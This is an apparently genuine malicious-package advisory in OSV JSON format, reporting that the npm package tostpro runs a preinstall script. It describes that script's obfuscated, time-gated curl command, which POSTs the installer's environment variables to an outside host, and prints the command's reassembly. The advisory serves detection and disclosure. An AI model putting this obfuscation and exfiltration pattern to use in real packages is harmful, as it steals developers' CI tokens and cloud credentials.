{"id":"MAL-2026-17564","summary":"Malicious code in tostpro (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (2b31f6e946441400814984e1285717f9b2ee7fe5dacb7f0433f89396648a6183)\nThe npm package tostpro@100.2.0 ships a preinstall lifecycle hook that invokes test.sh, which runs automatically on `npm install`. The script assembles the command `curl` and the data source `env` from single-letter shell variables (b=e, i=c, s=n, h=u, a=v, l=rl) and splits the destination into `dom=https://abbishal.` plus `tld=com`, reconstructing them at runtime as `$i$h$l -d \"`$b$s$a`\" $dom$tld/sh/poc`. Execution is gated by `if [ `date +%s` -gt 1791141300 ]` (a Unix timestamp corresponding to roughly 2026-10-04); once that deadline passes, the output of `env` — the installer's full process environment, which routinely contains CI tokens, cloud credentials, and API keys — is POSTed to https://abbishal.com/sh/poc. The README states \"No network access. No data collection,\" directly contradicting the shipped behavior. The string-splitting obfuscation, time-bomb gate, and cover-story README together indicate deliberate evasion.\n","modified":"2026-10-05T04:15:05.707580410Z","published":"2026-10-05T03:34:20Z","database_specific":{"malicious-packages-origins":[{"import_time":"2026-10-05T03:57:38.469492404Z","modified_time":"2026-10-05T03:34:58Z","sha256":"1c6e05f2f9962c27ba782116a27f8da86a29c6fc7d06c38a6bf79658f25aaaf5","source":"amazon-inspector","versions":["100.6.0"],"id":"IN-MAL-2026-021010"},{"id":"IN-MAL-2026-021006","import_time":"2026-10-05T03:57:38.16135054Z","modified_time":"2026-10-05T03:34:20Z","sha256":"2b31f6e946441400814984e1285717f9b2ee7fe5dacb7f0433f89396648a6183","source":"amazon-inspector","versions":["100.2.0"]}]},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/tostpro/v/100.6.0"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/tostpro/v/100.2.0"}],"affected":[{"package":{"name":"tostpro","ecosystem":"npm","purl":"pkg:npm/tostpro"},"versions":["100.6.0","100.2.0"],"database_specific":{"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/tostpro/MAL-2026-17564.json","cwes":[{"cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code"},{"cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code"}],"indicators":{"evidence_files":[{"path":"test.sh","sha256":"38cf91c2ae4bff8539681d75e477e3f8f6eb4250219cb526b5ec44211cab09fb","tlsh":"5b0123b345646374ddf908b31a5d53e6c2b5e05a857358fc62ef510513026e4223bd25"},{"path":"package.json","sha256":"bb355185dddb75d04c935ca3aff985b55a1d95e83e3712d4dcc55b1deacb573a","tlsh":"fce09aa88a219d3300c8e5a20ea6d54ba560ae5b82207d5d366b400c4b5c6a782ff6fd"}],"package_integrity":[{"filename":"tostpro-100.6.0.tgz","hashes":{"sha1":"3dcdab6d3874d5549ed897121b63cf7960a264ce","sha512_sri":"sha512-rqPzmJ3hKkAvUMYl43S+7VC4xWYdpoogKYKetCkDJAoHiKTLrilBMJqvZGQuGKDH3Wyv62KS8FENFP/oADmfbw=="}}]}}}],"schema_version":"1.9.0","credits":[{"name":"Amazon Inspector","contact":["inspector-research@amazon.com"],"type":"FINDER"}]}